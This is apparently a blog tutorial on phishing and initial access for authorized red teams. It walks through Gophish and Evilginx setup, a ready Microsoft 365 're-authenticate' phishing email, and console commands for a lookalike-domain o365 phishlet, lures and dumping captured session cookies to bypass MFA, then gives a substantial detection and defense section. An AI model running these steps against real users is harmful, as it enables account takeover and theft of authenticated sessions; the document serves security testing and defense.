Phishing and Initial Access Tradecraft for Authorized Red Teams

Mobile API OSINT
2025.08.17
Time it takes to read this article 5 minutes.

Legal & ethical disclaimer. Everything below is for education and authorized engagements only. Phishing real users without a signed Rules of Engagement (RoE) and explicit written scope is a crime in most jurisdictions. Run all infrastructure against accounts and domains you own or are contractually authorized to target. When in doubt, stop and ask your point of contact.

Introduction / Overview

Phishing remains the most reliable initial-access vector on modern red-team engagements. Endpoints are hardened, EDR is everywhere, and external services are patched — but humans still click. The interesting shift over the last few years is MFA: classic credential capture is mostly dead because a stolen password alone rarely lets you in. Adversary-in-the-middle (AiTM) tooling like Evilginx changed that by stealing the authenticated session cookie instead of the password, defeating most app-based and OTP MFA.

This article walks through the full initial-access chain a red team uses under authorization: building a pretext, standing up a Gophish campaign for tracking and payload delivery, and using Evilginx for MFA phishing. We finish with an equally detailed Detection & Defense section, because half of this job is making sure the blue team can see you.

This maps to MITRE ATT&CK T1566 (Phishing), T1566.002 (Spearphishing Link), and T1621 / T1111 (MFA interception).

How it works / Background

Two delivery models dominate authorized campaigns:

  1. Credential / session harvesting (AiTM). The target clicks a link to your reverse-proxy phishlet. Evilginx transparently proxies the real login page (e.g. login.microsoftonline.com), so the victim completes MFA against the genuine IdP. Evilginx captures the resulting session token. You import that cookie and you are authenticated — no password replay, no second factor required.

  2. Payload delivery. The link or attachment drops a loader (an HTA, signed LNK, ISO/IMG container, or a macro-free Office payload) that calls back to your C2. Gophish handles the email, the tracking pixel, the landing page, and click telemetry.

The critical concept is the pretext: the believable story that makes the target act. A good pretext aligns sender identity, timing, and a plausible call to action — an "IT password expiry," a "DocuSign for HR," a "shared Teams file." Tradecraft is 80% pretext quality and lookalike domain hygiene, 20% tooling.

Prerequisites / Lab setup

Build this in an isolated lab with test tenants and throwaway domains. Never test phishlets against production identity providers you do not own.

  • A cheap VPS (Debian/Ubuntu) with ports 80/443 reachable.
  • A registered lookalike domain plus DNS control (A records pointing at the VPS).
  • TLS certificates — Evilginx issues Let's Encrypt certs automatically; Gophish can use its own.
  • A test M365 / Okta tenant for MFA experiments.

Install Gophish:

wget https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
unzip gophish-v0.12.1-linux-64bit.zip -d gophish && cd gophish
# Bind the admin UI to localhost only; reach it over an SSH tunnel.
sed -i 's/127.0.0.1:3333/127.0.0.1:3333/' config.json
./gophish
Bash

On first run Gophish prints a randomly generated admin password to stdout (this replaced the old gophish/gophish default). Reach the admin panel via ssh -L 3333:127.0.0.1:3333 user@vps rather than exposing it.

Install Evilginx (v3, the maintained fork):

git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2 && make
sudo ./build/evilginx -p ./phishlets
Bash

Walkthrough / PoC

1. Sender infrastructure and reputation

Cold domains land in spam. Warm them: configure SPF, DKIM, and DMARC for your sending domain so the message authenticates, then check placement before the real send.

# Verify your sending domain's auth records resolve correctly.
dig +short TXT _dmarc.your-lookalike-domain.test
dig +short TXT default._domainkey.your-lookalike-domain.test
Bash

In Gophish, create a Sending Profile (SMTP host, from-address matching your pretext), an Email Template (with {{.FirstName}} and a tracked {{.URL}} link), and a Landing Page. Always test against your own seed accounts first.

2. Pretext and template

Keep it short and operational. A login-redirect pretext that pairs with Evilginx:

Subject: [Action Required] Re-authenticate your Microsoft 365 session

Hi {{.FirstName}},

Our records show your session for {{.Position}} expires today. Please
re-confirm access to avoid interruption:

  {{.URL}}

— IT Service Desk
Plaintext

The {{.URL}} points at the Evilginx lure, not the Gophish landing page, when you are doing session theft.

3. Evilginx MFA phishing

Configure Evilginx's domain and external IP, then enable a phishlet and create a lure:

: config domain your-lookalike-domain.test
: config ipv4 external <VPS_PUBLIC_IP>
: phishlets hostname o365 login.your-lookalike-domain.test
: phishlets enable o365
: lures create o365
: lures get-url 0
Plaintext

lures get-url 0 returns the link you deliver via Gophish. When the target authenticates — including MFA — Evilginx logs the captured session:

: sessions          # list captured sessions
: sessions 1        # dump tokens/cookies for session 1
Plaintext

Import the cookie JSON into a clean browser profile (e.g. the Cookie-Editor extension) and you load straight into the authenticated mailbox, MFA already satisfied. Note that phishing-resistant FIDO2/passkeys break this attack — Evilginx cannot proxy a WebAuthn assertion bound to the real origin.

4. Payload delivery variant

If the goal is execution rather than session theft, host a loader and reference it from the landing page. A common modern delivery is a signed .lnk inside an ISO (defeats Mark-of-the-Web on extracted contents). Track opens and clicks in the Gophish dashboard, then correlate first callback in your C2. See building C2 redirectors for keeping that infrastructure resilient, and OPSEC for red-team infra for domain categorization and TLS hygiene.

Mermaid diagram

Phishing and Initial Access Tradecraft for Authorized Red Teams diagram 1

The flow shows that delivery and click are necessary but FIDO2/passkeys are the decision point where the whole chain collapses.

Detection & Defense (Blue Team)

Defense here matters as much as the offense — these controls are what you recommend in the report.

Identity hardening (highest impact).

  • Deploy phishing-resistant MFA: FIDO2 security keys or platform passkeys. WebAuthn binds the credential to the legitimate origin, so an AiTM proxy on a lookalike domain cannot relay the assertion. This single control neutralizes Evilginx-class attacks.
  • Enforce Conditional Access with token binding / token protection and compliant-device requirements. Microsoft Entra's token protection and CAE (Continuous Access Evaluation) shorten the window a stolen cookie is usable.
  • Watch for impossible-travel and anomalous sign-ins (UEBA / Entra ID Protection risk events) — a session replayed from operator infrastructure often trips geo/ASN anomalies.

Email and link defenses.

  • Enforce inbound DMARC p=reject plus DKIM/SPF alignment to block spoofed display domains.
  • Detect lookalike / newly-registered domains with brand-monitoring and DNS feeds; new domains and homoglyphs are strong signals.
  • Use mail-flow link rewriting / detonation (Defender for Office 365 Safe Links, Proofpoint URL Defense) to sandbox destinations at click time.

Network and endpoint.

  • Hunt for Evilginx artifacts: its reverse-proxy TLS often shows a single autogenerated Let's Encrypt cert fronting a known IdP hostname, and proxied auth flows produce Referer/Origin mismatches. Logging User-Agent and source ASN at the IdP helps.
  • Apply Mark-of-the-Web enforcement and block ISO/IMG/LNK auto-mount via ASR rules (e.g. Block execution of potentially obfuscated scripts, Block executable content from email and webmail).
  • Map alerts to ATT&CK T1566.002 and T1621 in your SIEM for coverage tracking.

Human layer.

  • Run authorized, debriefed phishing simulations and report-phish buttons; measure report rate, not just click rate. A high report rate is a better metric than a low click rate.

For deeper SIEM correlation patterns, see hunting AiTM sessions in Entra logs.

Conclusion

Modern phishing tradecraft has moved from password theft to session theft. Gophish gives you reliable delivery and telemetry; Evilginx defeats OTP and push MFA by proxying the genuine IdP and stealing the resulting cookie. The defensive takeaway is unambiguous: phishing-resistant FIDO2/passkeys plus token protection break the chain entirely, and DMARC, lookalike-domain monitoring, and Safe-Links raise the cost of every earlier stage. A good engagement report sells those controls as hard as it demonstrates the attack.

References

Comments

Copied title and URL